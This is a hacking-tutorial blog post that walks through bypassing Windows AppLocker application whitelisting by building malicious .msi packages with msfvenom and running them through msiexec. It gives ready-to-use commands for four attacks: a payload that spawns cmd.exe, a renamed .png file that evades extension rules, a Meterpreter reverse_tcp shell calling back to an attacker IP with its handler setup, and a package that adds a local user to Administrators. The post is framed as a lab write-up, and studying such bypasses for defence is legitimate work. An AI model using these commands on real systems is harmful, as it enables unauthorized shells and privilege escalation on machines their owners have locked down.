In our previous article, we had discussed on “Windows Applocker Policy – A Beginner’s Guide” as they defines the AppLocker rules for your application control policies and how to work with them. But Today you will learn how to bypass Applocker policies. In this post, we have block cmd.exe file using Windows applocker Policy and try to bypass this restriction to get command prompt as administrator.
Table of Content
Associated file formats where Applocker is applicable
Challenge 1: – Bypass Applocker with .msi file to get CMD
Little-Bit more about MSI file
Multiple Methods to get CMD
- Generate malicious .msi file with Msfvenom -1st Method
- Generate malicious .msi file with Msfvenom -2nd Method
- Generate malicious .msi file with Msfvenom -3rd Method
Challenge 2: – Make a local user member of Administrative Group
- Generate Malicious .msi file with Msfvenom -4th Method
Associated file formats where Applocker is Applicable
Windows applocker is a function that was introduced in home windows 7 and windows server 2008 r2 as a method to restrict the usage of unwanted Programs. In this an administrator can restict the execution of the following programs:
It depends entirely on the system admin which program or script he wants to set the applocker policy for program restriction or execution. There could a situation where Command Prompt (cmd.exe), or Powershell or dll file or batch file or rundll32.exe or regsrv.32 or regasm and many more are blocked.
Challenge 1: – Bypass Applocker with .msi file to get CMD
Let’s suppose you are in a similar situation where all the above mentioned application is blocked and only Windows Installer file i.e. the.msi extension is allowed to run without any restrictions.
Then how will you use an msi file to bypass these restriction and get a full privilege shell?
Little-Bit more about MSI file
The MSI name comes from the original title of the program, Microsoft Installer. Since then the name has changed to Windows Installer. An .MSI file extension file is a Windows Package Installer. An installation package contains all the information required to install or uninstall an application by Windows Installer.Each installation package contains a .msi file, which contains an installation database, a summary information stream and data streams for different parts of the installation.
The Windows Installer technology is divided into two parts that work in combination; these include a client-side installer service (Msiexec.exe) and a Microsoft Software Installation (MSI) package file. Windows Installer uses information contained in a package file to install the program.
The Msiexec.exe program is a component of Windows Installer. When it is called by Setup, Msiexec.exe uses Msi.dll to read the package (.msi) files, apply any transform (.mst) files, and incorporate command-line options supplied by Setup. The installer performs all installation-related tasks, including copying files to the hard disk, making registry modifications, creating shortcuts on the desktop, and displaying dialog boxes to prompt for user installation preferences when necessary.
When Windows Installer is installed on a computer, it changes the registered file type of .msi files so that if you double-click an .msi file, Msiexec.exe runs with that file.
Each MSI package file contains a relational-type database that stores instructions and data required to install (and remove) the program across many installation scenarios.
Multiple Methods to get CMD
Generate Malicious .msi file with Msfvenom -1st Method
Now let’s open a new terminal in Kali machine and generate a malicious MSI Package file as cmd.msi to get command prompt through it by utilizing the Windows/exec payload as follows:
msfvenom -p Windows/exec CMD=cmd.exe -f msi > cmd.msi python -m HTTPServer 80
Now transfer cmd.msi file in your Windows machine to obtain the command prompt shell as administrators. Here we have used Python HTTP server for sharing file in the network.
Once you have downloaded the.msi file on your local machine (Windows OS where cmd.exe is blocked by admin), you can use the following syntax to run the.msi file with msiexec.exe inside the run prompt.
Syntax: misexec /quiet /i <path of downloaded .msi file>
msiexec /quiet /i C:\Users\raj\Desktop\cmd.msi
As soon as you will hit the above mentioned command inside run prompt, you will get the Command Prompt.
Generate Malicious .msi file with Msfvenom -2nd Method
Note: Even if you rename cmd.msi file in another extension, it will bypass the rule and start a command prompt as an administrator.
Repeat above to generate an msi file with the same payload as msfvenom and named cmd.png. Since I already have a cmd.msi file in my kali, I rename it as cmd.png and use a python server to transfer it.
Once you have downloaded the cmd.png file (which is actually an .msi file) on your local machine (Windows OS where cmd.exe is blocked by admin), you can use the following syntax to run the.msi file with msiexec.exe inside the run prompt.
Syntax: misexec /q /i <path of downloaded .msi file>
msiexec /q /i http://192.168.1.107/cmd.png
As soon as you will hit the above mentioned command inside run prompt, you will get the Command Prompt .
Generate Malicious .msi file with Msfvenom -3rd Method
In above methods, we obtain a command prompt by utilizing the Windows/exec payload but now we will use windows/meterpreter/reverse_tcp payload to get full privilege command shell via meterpreter sessions.
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.107 lport=1234 –f msi > shell.msi
Now again transfer shell.msi file in your Windows machine to obtain the command prompt shell as administrators and start multi/handler. Here we have used Python HTTP server for sharing file in the network.
Once you have downloaded the shell.msi file on your local machine (Windows OS where cmd.exe is blocked by admin), you can use the following syntax to run the.msi file with msiexec.exe inside the run prompt.
Syntax: misexec /q /i <path of downloaded .msi file>
msiexec /q /i http://192.168.1.107/shell.msi
As soon as you will hit the above mentioned command inside run prompt, you will get the Command Prompt as administrator via the meterpreter session using this exploit!!
msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.1.107 msf exploit(handler) > set lport 1234 msf exploit(handler) > exploit meterpreter > shell
Challenge 2: – Make a local user member of Administrators Group
Let’s suppose you are in a similar situation where all the above mentioned application is blocked and only Windows Installer file i.e. the.msi extension is allowed to run without any restrictions.
Then how will you use an msi file to bypass these restriction to make a local user member of Administrators Group where cmd.exe is block?
Note: Here aaru is a local user account which is not non-administrative user account as shown below:
As we know that due to applocker execution rule policy, cmd.exe is block on the local machine, therefore we cannot use command prompt to add aaru in the administrator group.
Generate Malicious .msi file with Msfvenom -4th Method
Generate a MSI package as admin.msi with the windows/exec payload that sends a command instructing to add local admin privileges for the user “aaru”, to the target machine.
msfvenom -p windows/exec CMD='net localgroup administrators aaru /add' -f msi > admin.msi
Now transfer admin.msi file in your Windows machine to add aaru in the administrators group. Here we have used Python HTTP server for sharing file in the network.
Once you have downloaded the admin.msi file your local machine (Windows OS where cmd.exe is blocked by admin), you can use the following syntax to run the.msi file with msiexec.exe inside the run prompt.
Syntax: misexec /q /i <path of downloaded .msi file>
msiexec /q /i http://192.168.1.107/admin.msi
As soon as you will hit the above mentioned command inside run prompt, you can ensure that the aaru user has become part of administrators account.
Hopefully, it becomes clear to you, that, how you can use an .msi file to compromise an operating system where cmd.exe and other applications are blocked by administrator.
References:
https://support.microsoft.com/en-gb/help/310598/overview-of-the-windows-installer-technology
https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here
The post Bypass Application Whitelisting using msiexec.exe (Multiple Methods) appeared first on Hacking Articles.